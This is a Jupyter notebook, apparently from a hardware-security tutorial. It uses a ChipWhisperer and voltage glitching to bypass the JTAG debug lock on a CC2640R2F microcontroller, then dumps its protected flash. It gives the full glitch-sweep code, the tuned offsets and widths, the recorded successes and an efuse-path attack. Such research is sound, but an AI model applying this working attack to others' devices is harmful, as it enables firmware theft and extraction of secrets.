# Bypassing debug security using voltage fault injection

In this notebook we explore how JTAG access can be enabled on a locked down CC2640R2F microcontroller by targeting the ROM bootloader using voltage fault injection. Recall that so far we have already dumped the ROM bootloader and analysed it in Ghidra. From that analysis we know that the ROM bootloader parses the CCFG settings and enables JTAG access by writing to the `AON_WUC:JTAGCFG` register. By glitching a basic double loop we also determined that the microcontroller is susceptible to voltage fault injection, and we determined a range for the glitch width parameter. 

Make sure that your target hardware has been prepped for fault injection and side-channel analysis.
You should be all set if you already completed the notebook covering fault injection on the double loop.

## Hardware Setup
To run this notebook you will need the hardware outlined in the main README of the repository. You will also need to modify your target for voltage glitching, at a minimum this requires removing C19 and connecting the ChipWhisperer glitch port to the DCOUPL pin. Additionally, you should remove capacitor C20 connected to the reset line. All instructions for modifying the targets are provided in the main README.

Make sure to connect your ChipWhisperer to the modified LAUNCHXL-CC2640R2 board before running the notebook.
For this notebook specifically we will trigger on the reset line. Please make the following connections:

* Connect the target SMA connector to your ChipWhisperer's measurement port
* Remove the 3V3 jumper and connect the target side pin to the ChipWhisperer's 3V3 output
* Remove the RESET jumper and connect the target side to the ChipWhisperer's NRST output
* Connect the ChipWhisperer's IO4/TRG to the target's RESET pin
  * On the LAUNCHXL-CC2640R2 you can also connect to the BPRST pin
* Connect the ChipWhisperer's ground to a ground pin on the target board

In [1]:
import sys
import itertools  
from bokeh.plotting import figure, show
from bokeh.io import output_notebook, push_notebook
from bokeh.palettes import Dark2_5 as palette
import time
import numpy as np
import chipwhisperer as cw
from tqdm.notebook import tqdm
import serial

ser = 0

In [2]:
# Connect to the ChipWhisperer
scope = cw.scope()

In [3]:
# Modify the dslite_path variable to point to your installation of Uniflash
# Running this cell will load the example target firmware
# THIS WILL OVERWRITE THE FIRMWARE ON YOUR LAUNCHXL-CC2640R2

import subprocess
from pathlib import Path

home_dir = str(Path.home()) 
dslite_path = home_dir + '/ti/uniflash_7.0.0/dslite.sh'
erase_cmd = dslite_path + ' --mode cc13xx-cc26xx-mass-erase -d XDS110'
flash_cmd = dslite_path + ' --config ./bin/CC2640R2F.ccxml --flash ./bin/VFI_SCA_CC2640R2.out' 

In [4]:
# Connect to the LAUNCHXL-CC2640R2 UART
# You may have to change the serial port ('/dev/ttyACM1')

if ser:
    ser.close()

ser = serial.Serial('/dev/ttyACM1', 115200)

## Bootloader side-channel analysis

Let's aquire two sets of side-channel traces that cover the execution of the ROM bootloader:
1. The first set will be acquired when the microcontroller's flash storage is erased (i.e. an invalid firmware image)
2. The second set will be acquired while a valid firmware image is flashed to the microcontroller

By comparing these two sets we will determine an approximate offset in the time domain when JTAG is being disabled/enabled.

Note that to acquire side-channel measurements you will have to connect your targets DCOUPL pin to the ChipWhisperer's measurement port. For the best results you should also apply ~1.4V to connection point D using an external power supply (see the main README.md). For this example you can also try cranking up the ChipWhisperer's gain (`scope.gain.db`) instead of connecting an external power supply.

In [5]:
ntraces = 100

In [6]:
# ChipWhisperer configuration

scope.adc.samples = 131070
scope.clock.clkgen_src = 'system'
scope.clock.clkgen_freq = 100e6
scope.clock.adc_mul = 1
scope.adc.offset= 0
scope.trigger.triggers = "tio4"
scope.adc.basic_mode = "rising_edge"
scope.glitch.enabled = False
scope.gain.db = 25
scope.io.target_pwr = True

In [7]:
# Erase the target firmware
process = subprocess.Popen(erase_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()

if b'Device Unlocked' not in output[0]:
    print('There was an error while trying to erase the microcontroller')
    print(output)

# Acquire side-channel traces    
traces_invalid = np.zeros((ntraces, scope.adc.samples), dtype='float64')

# The ChipWhisperer will start sampling on a rising edge of the trigger
# In this case the trigger pin (tio4) is also connected to the target reset line
# We thus start capturing data from the moment the microcontroller is released from reset

for i in tqdm(range(ntraces)):
    scope.io.nrst = 'low' # The ChipWhisperer will start sampling on a rising edge of the trigger
    scope.arm()
    scope.io.nrst = 'high'
    
    scope.capture(poll_done=True)
    traces_invalid[i] = scope.get_last_trace()

  0%|          | 0/100 [00:00<?, ?it/s]

In [8]:
process = subprocess.Popen(flash_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
if b'Board Reset Complete' in output[0]:
    print('Target has been flashed!')
else:
    print('Error flashing target. Check your connections and try again.')

traces_valid = np.zeros((ntraces, scope.adc.samples), dtype='float64')

for i in tqdm(range(ntraces)):
    scope.io.nrst = 'low'
    scope.arm()
    scope.io.nrst = 'high'
    
    scope.capture(poll_done=True)
    traces_valid[i] = scope.get_last_trace()

Target has been flashed!


  0%|          | 0/100 [00:00<?, ?it/s]

The following plot contains a trace from each set (without performing alignment).
There is a clear offset in time (should be near sample 97000) at which both traces start deviating significantly.

From the documentation we know that the Serial Bootloader Interface will be executed when there isn't a valid firmware image in flash. Additionally, from our static analysis of the ROM bootloader we know that the JTAG related CCFG settings are being processed right before the ROM bootloader determines if a valid firmware image is present.

In other words, we expect that JTAG is being enabled/disabled slightly before the blue peak (i.e. before sample 97000). This helps us to narrow down the moment in time (or the offset from bootup) where we want to inject our glitch.

You can also try to narrow down the exact moment in time more precisely by targeting the contents of the `CCFG:CCFG_TAP_DAP_0` and `CCFG:CCFG_TAP_DAP_1` registers using DPA/CPA. In this demonstration notebook we stick to comparing a valid and invalid firmware image as it clearly shows when the two execution paths deviate, without having to improve the acquisition setup or having to perform alignment.

In [9]:
output_notebook()
p = figure(sizing_mode='scale_width', plot_height=300, plot_width=900)

x_range = range(0, traces_invalid.shape[1])

p.line(x_range, traces_valid[0], color='red', legend_label='valid fw')
p.line(x_range, traces_invalid[0], color='blue', legend_label='invalid fw')

# Uncomment these lines to plot the means of each set
#p.line(x_range, np.mean(traces_valid, axis=0), color='red', legend_label='valid fw mean')
#p.line(x_range, np.mean(traces_invalid, axis=0), color='blue', legend_label='invalid fw mean')

p.legend.click_policy="hide"
show(p)

Loading BokehJS ...

# Fault injection
We know from the previous section that the critical operation (disabling/enabling JTAG) likely happens before offset 97000. In the notebook covering the double loop fault injection experiments we determined that a glitch width of 20 ChipWhisperer clock cycles (@ 200 MHz) resulted in many faults, so we will reuse that width here. Note that you may have to change the glitch width (`scope.glitch.repeat`) if you obtained different results in the double loop glitch notebook.

## Experiment 1: dummy target
In a realistic scenario we would have to reset the target chip, perform a glitch and then try to connect to the target over JTAG. We will see later that this is possible in experiment 2, but for now we will use a slightly simpler setup to increase the number of glitch attempts per second.

Specifically, we will use a firmware image with a CCFG configured to disable JTAG. The firmware will read the `AON_WUC:JTAGCFG` register (0x40091040) and sends the value back over UART. By comparing this value to that of a known locked and known unlocked state we can quickly check if JTAG is locked or unlocked.

**Make sure the connect the DCOUPL pin to the ChipWhisperer's glitch port for the following experiments!**

In [10]:
scope.io.nrst = 'low'
scope.io.target_pwr = False
time.sleep(2)
scope.io.target_pwr = True
scope.io.nrst = 'high'

process = subprocess.Popen(erase_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()

if b'Device Unlocked' not in output[0]:
    print('There was an error while trying to erase the microcontroller')
    print(output)
else:
    scope.io.nrst = 'low'
    scope.io.target_pwr = False
    time.sleep(0.1)
    scope.io.target_pwr = True
    scope.io.nrst = 'high'
    
    process = subprocess.Popen(flash_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output = process.communicate()
    if b'Board Reset Complete' in output[0]:
        print('Target has been flashed!')
    else:
        print('Error flashing target. Check your connections and try again.')

Target has been flashed!


In [11]:
# ChipWhisperer configuration

scope.adc.clear_clip_errors()
scope.clock.clkgen_src = 'system'
scope.clock.clkgen_freq = 200e6
scope.clock.adc_mul = 1
scope.trigger.triggers = "tio4"
scope.adc.basic_mode = "rising_edge"

scope.glitch.enabled = True
scope.glitch.clk_src = 'pll'
scope.clock.pll.update_fpga_vco(600e6)
scope.glitch.output = "enable_only"
scope.glitch.trigger_src = 'ext_single'
scope.io.glitch_lp = True
scope.io.glitch_hp = False

In [12]:
# Simple function to reset the target microcontroller
def reset_dut(delay=0.1):
    scope.io.nrst = 'low'
    scope.io.target_pwr = False
    time.sleep(delay)
    scope.io.target_pwr = True
    scope.io.nrst = 'high'
    time.sleep(0.05)
    
    
# A more thorough reset function that verifies that the target is alive again
def thorough_reset_dut(delay=0.05): 
    reset_dut(delay)
    
    ser.write(b'r') # To select the AON_WUC:JTAGCFG readback function
    time.sleep(0.05)
    ret = ser.read(ser.in_waiting)
    
    while ret != b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\xff':
        delay += 0.1
        reset_dut(delay)
        ser.write(b'r')
        time.sleep(0.05)
        ret = ser.read(ser.in_waiting)

In [13]:
thorough_reset_dut()
ser.write(b'r')
time.sleep(0.05)
ret = ser.read(ser.in_waiting)
print('Default output when JTAG is disabled:', ret.hex())

Default output when JTAG is disabled: 00000000000000ff000000ff


In [14]:
jtag_disabled = b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\xff'

# Note that some other other values of the first byte will also enable JTAG access
# Using this value for simplicity
jtag_enabled = b'\x09\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\xff'

In [15]:
# Note that we had to ChipWhisperer set to 100 MHz while aquiring the side-channel traces
# At this point the ChipWhisperer's clock is set to 200 MHz. 
# The offset of 97000 samples we determined earlier now corresponds to 194000 samples.

offset_start = 194000 # Glitching from the end towards the start
offset_end = 188200

The next cell will perform an initial fault injection campaign. It should should take ~10 minutes to run and it should yield a few successful glitches. 

If the output contains a few "Fault!" prints but no "Success!" you might have been unlucky and you can try to run the cell again. You can try to increase `scope.glitch.repeat` if the reset counter stays at 0, and you do not see any "Fault!" or "Success!" prints. The same value for `scope.glitch.repeat` as what was determined in the double loop glitch notebook should also work here. In my specific case I had to slightly decrease the glitch width.

Note that after running this cell it may be a good idea to reprogram the target, the target will occasionally delete all flash memory when glitching too early (offset < 188000). This is important to keep in mind when glitching your real target, you wouldn't want it to erase its firmware.

If everything went well you can now see that an offset range between 188340 and 188460 should work well to get the type of glitch we are after.

In [16]:
scope.glitch.repeat = 18

offsets = np.arange(offset_start, offset_end, -2)

n_attempts = 5
crashes = 0
faults  = 0
success = 0

for offset in tqdm(range(len(offsets))):
    scope.glitch.ext_offset = offsets[offset]
    
    for i in range(n_attempts):
        scope.io.nrst = 'low'
        scope.arm()
        scope.io.nrst = 'high'
        
        time.sleep(0.01)
        ser.write(b'r')
        time.sleep(0.01)
        ret = ser.read(ser.in_waiting)

        if ret != jtag_disabled:
            if ret == b'':
                crashes += 1
                thorough_reset_dut()
            else:
                faults += 1
                
                if ret == jtag_enabled:
                    success += 1
                    print('Success!', offsets[offset], ret.hex())
                else:
                    print('Fault!', offsets[offset], ret.hex())
                
    if offset % 50 == 0:
        print("Offset: %d, faults: %d, success: %d, resets: %d" % (offsets[offset], faults, success, crashes))
        thorough_reset_dut
        
total = len(offsets)*n_attempts
print("Total # attempts:", total) 
print("Total # faults: %d (%f%%)" % (faults, (faults/total)*100))
print("Total # success: %d (%f%%)" % (success, (success/total)*100))
print("Total # resets: %d (%f%%)" % (crashes, (crashes/total)*100))

  0%|          | 0/2900 [00:00<?, ?it/s]

Offset: 194000, faults: 0, success: 0, resets: 4
Offset: 193900, faults: 0, success: 0, resets: 203
Offset: 193800, faults: 0, success: 0, resets: 389
Offset: 193700, faults: 0, success: 0, resets: 480
Offset: 193600, faults: 0, success: 0, resets: 562
Offset: 193500, faults: 0, success: 0, resets: 709
Offset: 193400, faults: 0, success: 0, resets: 810
Offset: 193300, faults: 0, success: 0, resets: 923
Offset: 193200, faults: 0, success: 0, resets: 1057
Offset: 193100, faults: 0, success: 0, resets: 1192
Offset: 193000, faults: 0, success: 0, resets: 1318
Offset: 192900, faults: 0, success: 0, resets: 1381
Offset: 192800, faults: 0, success: 0, resets: 1464
Offset: 192700, faults: 0, success: 0, resets: 1514
Offset: 192600, faults: 0, success: 0, resets: 1514
Offset: 192500, faults: 0, success: 0, resets: 1514
Offset: 192400, faults: 0, success: 0, resets: 1514
Offset: 192300, faults: 0, success: 0, resets: 1514
Offset: 192200, faults: 0, success: 0, resets: 1514
Offset: 192100, faults

The next cells will run the same experiment, but we now use a smaller range of offsets and more attempts (`n_attempts`) per offset.

In [17]:
offset_start = 188340
offset_end = 188460
n_attempts = 50

# You can try to optimize the glitch width manually
# Or modify the experiment to try multiple glitch widths
scope.glitch.repeat = 18 

In [18]:
offsets = np.arange(offset_start, offset_end, 1)

crashes = 0
faults  = 0
success = 0

for offset in tqdm(range(len(offsets))):
    scope.glitch.ext_offset = offsets[offset]
    
    for i in range(n_attempts):
        scope.io.nrst = 'low'
        scope.arm()
        scope.io.nrst = 'high'
        
        time.sleep(0.01)
        ser.write(b'r')
        time.sleep(0.01)
        ret = ser.read(ser.in_waiting)

        if ret != jtag_disabled:
            if ret == b'':
                crashes += 1
                thorough_reset_dut()
            else:
                faults += 1
                
                if ret == jtag_enabled:
                    success += 1
                    print('Success!', offsets[offset], ret.hex())
                
    if offset % 50 == 0:
        print("Offset: %d, faults: %d, success: %d, resets: %d" % (offsets[offset], faults, success, crashes))
        thorough_reset_dut
        
total = len(offsets)*n_attempts
print("Total # attempts:", total) 
print("Total # faults: %d (%f%%)" % (faults, (faults/total)*100))
print("Total # success: %d (%f%%)" % (success, (success/total)*100))
print("Total # resets: %d (%f%%)" % (crashes, (crashes/total)*100))

  0%|          | 0/120 [00:00<?, ?it/s]

Offset: 188340, faults: 3, success: 0, resets: 10
Success! 188343 09000000000000ff000000ff
Success! 188348 09000000000000ff000000ff
Success! 188350 09000000000000ff000000ff
Success! 188356 09000000000000ff000000ff
Success! 188366 09000000000000ff000000ff
Success! 188368 09000000000000ff000000ff
Success! 188381 09000000000000ff000000ff
Success! 188382 09000000000000ff000000ff
Success! 188383 09000000000000ff000000ff
Success! 188386 09000000000000ff000000ff
Success! 188387 09000000000000ff000000ff
Success! 188389 09000000000000ff000000ff
Success! 188389 09000000000000ff000000ff
Offset: 188390, faults: 90, success: 13, resets: 905
Success! 188396 09000000000000ff000000ff
Success! 188397 09000000000000ff000000ff
Success! 188397 09000000000000ff000000ff
Success! 188404 09000000000000ff000000ff
Success! 188407 09000000000000ff000000ff
Success! 188408 09000000000000ff000000ff
Success! 188409 09000000000000ff000000ff
Success! 188410 09000000000000ff000000ff
Success! 188411 09000000000000ff0000

## Experiment 2: a more realistic setting

In the previous experiment the device under attack was informing us when our glitch successfully caused JTAG to be enabled. 

In this second experiment we attack our target in a more realistic setting, we will have to reset the target, inject a glitch and try to read memory using JTAG. This process is usually slower, luckily we already know a glitch width and offset that work well.

We can detect if our glitch was successful using DSLite (the CLI to Uniflash).
So now we reset our target, inject a glitch and try to read the firmware using DSLite. JTAG is enabled if we are able to read the firmware.

The following cells show the output produced by DSLite when JTAG is disabled and when it is enabled.

In [19]:
dump_cmd  = dslite_path + ' --mode memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin'

In [20]:
# First erase the target device and observe the Uniflash output
# We should get the same output when our glitch results in JTAG being enabled!

reset_dut(0.5)

process = subprocess.Popen(erase_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
assert(b'Device Unlocked' in output[0])

process = subprocess.Popen(dump_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
print(output)

(b'Executing the following command:\n> /home/lennert/ti/uniflash_7.0.0/deskdb/content/TICloudAgent/linux/ccs_base/DebugServer/bin/DSLite memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin\n\nFor more details and examples, please refer to the UniFlash Quick Start guide.\n\nDSLite version 11.0.0.2538\nConfiguring Debugger (may take a few minutes on first launch)...\n\tInitializing Register Database...\n\tInitializing: IcePick_C\n\tExecuting Startup Scripts: IcePick_C\n\tInitializing: CS_DAP_0\n\tExecuting Startup Scripts: CS_DAP_0\n\tInitializing: Cortex_M3_0\n\tExecuting Startup Scripts: Cortex_M3_0\nGEL: Cortex_M3_0: GEL Output: Memory Map Initialization Complete.\nConnecting...\nReading memory...\nSave Memory\n\tStoring Data...\n\t: 50%\n\t: 100%\nSuccess\n', b'')


In [21]:
# Now we flash the new firmware, reset the device and try to dump the firmware again
# Note that the Uniflash output now indicates that it was unable to connect to the target

process = subprocess.Popen(flash_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
assert(b'Board Reset Complete' in output[0])

# Reset is required for changes to take effect. 
# The rom bootloader needs to read the new CCFG and disable JTAG.
reset_dut(0.5) 

process = subprocess.Popen(dump_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
print(output)

(b'Executing the following command:\n> /home/lennert/ti/uniflash_7.0.0/deskdb/content/TICloudAgent/linux/ccs_base/DebugServer/bin/DSLite memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin\n\nFor more details and examples, please refer to the UniFlash Quick Start guide.\n\nDSLite version 11.0.0.2538\nConfiguring Debugger (may take a few minutes on first launch)...\n\tInitializing Register Database...\n\tInitializing: IcePick_C\n\tExecuting Startup Scripts: IcePick_C\n\tInitializing: CS_DAP_0\n\tExecuting Startup Scripts: CS_DAP_0\n\tInitializing: Cortex_M3_0\n\tExecuting Startup Scripts: Cortex_M3_0\nGEL: Cortex_M3_0: GEL Output: Memory Map Initialization Complete.\nConnecting...\nfatal: IcePick_C: Error connecting to the target: (Error -241 @ 0x0) A router subpath could not be accessed. A security error has probably occurred. Make sure your device is unlocked. (Emulation package 9.5.0.00141) \n', b'Failed: Operation was aborted\n')


We can now distinguish a successful glitch from an ineffective one!

* Ineffective glitch --> JTAG remains disabled --> DSLite outputs 'Error connecting to the target'
* Successful glitch --> JTAG is enabled --> DSLite reads flash memory and outputs 'Success'

Our fault injection loop from before is now modified to distinguish these two scenarios.
The next cell will run the actual attack and will stop when JTAG has been enabled.

One attempt now takes roughly 2 seconds which is a lot slower compared to the ~0.065 seconds per attempt we were able to achieve in experiment 1. Fortunately, thanks to experiment 1 we have a good set of parameters, successfully enabling JTAG should only take a few minutes.

Here are a few ways in which you could attempt to optimize this attack, but it may not be worth the effort.
* You can try to improve the success rate of the attack by fine tuning the glitch parameters. 
* Try to get rid of some of the jitter in the setup, this will likely result in a more repeatable glitch. You could try to achieve this by using [analog waveform triggering](https://rtfm.newae.com/Capture/ChipWhisperer-Pro/#sum-of-absolute-differences-sad).
* You can try to use a different hardware interface or software tool to check if JTAG is enabled or not. This can decrease the time it takes to perform one attempt. A recent ChipWhisperer feature may be useful here: https://chipwhisperer.readthedocs.io/en/latest/debugging.html

In [22]:
offset_start = 188390
offset_end = 188460
scope.glitch.repeat = 18
n_attempts = 20


offsets = np.arange(offset_start, offset_end, 1)
stop = False

for offset in tqdm(range(len(offsets))):
    if stop == True:
        break
    
    reset_dut(delay=0.5)
    scope.glitch.ext_offset = offsets[offset]
    
    for i in range(n_attempts):
        scope.io.nrst = 'low'
        scope.arm()
        scope.io.nrst = 'high'
        
        process = subprocess.Popen(dump_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        output = process.communicate()
        
        if b'Error connecting to the target' not in output[0]:
            if b'Success' in output[0]:
                print(output)
                print('Success! JTAG is now enabled!')
                stop = True
                break
            else:
                print('weird...', output)

  0%|          | 0/70 [00:00<?, ?it/s]

(b'Executing the following command:\n> /home/lennert/ti/uniflash_7.0.0/deskdb/content/TICloudAgent/linux/ccs_base/DebugServer/bin/DSLite memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin\n\nFor more details and examples, please refer to the UniFlash Quick Start guide.\n\nDSLite version 11.0.0.2538\nConfiguring Debugger (may take a few minutes on first launch)...\n\tInitializing Register Database...\n\tInitializing: IcePick_C\n\tExecuting Startup Scripts: IcePick_C\n\tInitializing: CS_DAP_0\n\tExecuting Startup Scripts: CS_DAP_0\n\tInitializing: Cortex_M3_0\n\tExecuting Startup Scripts: Cortex_M3_0\nGEL: Cortex_M3_0: GEL Output: Memory Map Initialization Complete.\nConnecting...\nReading memory...\nSave Memory\n\tStoring Data...\n\t: 50%\n\t: 100%\nSuccess\n', b'')
Success! JTAG is now enabled!


The above example terminates when JTAG is enabled, and automatically creates a dump of the flash memory. At this point you can connect to the target using the Uniflash GUI application. Using Uniflash we can then read the flash memory, including the CCFG. The following screenshot shows the CCFG page being read after a successful glitch. As you can see the CCFG is configured to disable JTAG, yet we are able to read memory!

![Uniflash](img/uniflash_bypassed.png)

Once you reset the microcontroller JTAG will be disabled again, so you may want to modify the CCFG to permanently enable JTAG.

In [23]:
# This command prints all strings in the firmware dump that are at least 10 characters long
!strings -n 10 dump.bin

`(i0a(}0uh}pu
0x8pphx`0x(
!i"hQ\)pch!i
,h!h)`!hM`
This a super secret string!


## Experiment 3: Abusing a manufacturing leftover

While reverse engineering the ROM bootloader we noticed that there might be an additional avenue for fault injection to bypass the debug security features. The following flowchart summarises the debug security related actions performed by the ROM bootloader. In the previous experiments we were targeting the FCFG and CCFG parsing routines. In this experiment we will target the first decision in the flowchart. 

The microcontrollers reads a row of efuse memory, this fuse is normally blown as part of the manufacturing process. In commercially available devices the ROM bootloader will thus always write 0 to the `AON_WUC:JTAGCFG` register. Using fault injection we hope to force the microcontroller to take the alternative execution path that will result in enabling all JTAG DAPs and TAPs, regardless of the FCFG and CCFG configurations.

From the previous experiment it is clear that connecting to the target with a debugger is relatively slow. However, as you can see from the flowchart, the microcontroller will conveniently pull a GPIO pin high when it enabled JTAG access. This feature is likely used as part of the semiconductor manufacturing process, but it is also very convenient for us as an attacker!

Similar to the previous experiments we can reset the microcontroller and insert a glitch. This time around we can simply check if the DIO_23 pin is high, indicating that the glitch was successful! We can use one of the ChipWhisperer's Target IO pins to check if DIO_23 is high.

Make the following changes to your setup for this experiment:
* Connect the ChipWhisperer's TIO3 to the DIO_23 pin on the LAUNCHXL-CC2640R2 board
* Add a pull-down resistor to TIO3/DIO_23 (you can use the headers on the bottom side of the LAUNCHXL-CC2640R2 board)

![ROM bootloader flowchart](img/cc2640r2f_flowchart.png)

In [24]:
reset_dut()
scope.io.tio3 = 'high_z' # Configure the ChipWhisperer TIO3
print('TIO3 state:', scope.io.tio_states[2])

TIO3 state: 0


In [29]:
scope.glitch.repeat = 17
offset_start = 161150
offset_end = 161300

offsets = np.arange(offset_start, offset_end, 1)

n_attempts = 200
stopit = False

for offset in tqdm(range(len(offsets))):
    if stopit:
        break
    
    scope.glitch.ext_offset = offsets[offset]
    thorough_reset_dut()
    
    for i in range(n_attempts):
        scope.io.nrst = 'low'
        scope.arm()
        scope.io.nrst = 'high'
        time.sleep(0.005)

        if scope.io.tio_states[2] != 0:
            print('Success!, TIO3 state:', scope.io.tio_states[2], offsets[offset])
            stopit = True
            break

  0%|          | 0/205 [00:00<?, ?it/s]

Success!, TIO3 state: 1 161296


In [30]:
# I found that sometimes you have to run this command multiple times for the dump to succeed
dump_cmd  = dslite_path + ' --mode memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin'
process = subprocess.Popen(dump_cmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.communicate()
print(output)

(b'Executing the following command:\n> /home/lennert/ti/uniflash_7.0.0/deskdb/content/TICloudAgent/linux/ccs_base/DebugServer/bin/DSLite memory --config ./bin/CC2640R2F.ccxml --verbose --range=0,16376 --output=dump.bin\n\nFor more details and examples, please refer to the UniFlash Quick Start guide.\n\nDSLite version 11.0.0.2538\nConfiguring Debugger (may take a few minutes on first launch)...\n\tInitializing Register Database...\n\tInitializing: IcePick_C\n\tExecuting Startup Scripts: IcePick_C\n\tInitializing: CS_DAP_0\n\tExecuting Startup Scripts: CS_DAP_0\n\tInitializing: Cortex_M3_0\n\tExecuting Startup Scripts: Cortex_M3_0\nGEL: Cortex_M3_0: GEL Output: Memory Map Initialization Complete.\nConnecting...\nReading memory...\nSave Memory\n\tStoring Data...\n\t: 50%\n\t: 100%\nSuccess\n', b'')


In [31]:
# This command prints all strings in the firmware dump that are at least 10 characters long
!strings -n 10 dump.bin

`(i0a(}0uh}pu
0x8pphx`0x(
!i"hQ\)pch!i
,h!h)`!hM`
This a super secret string!
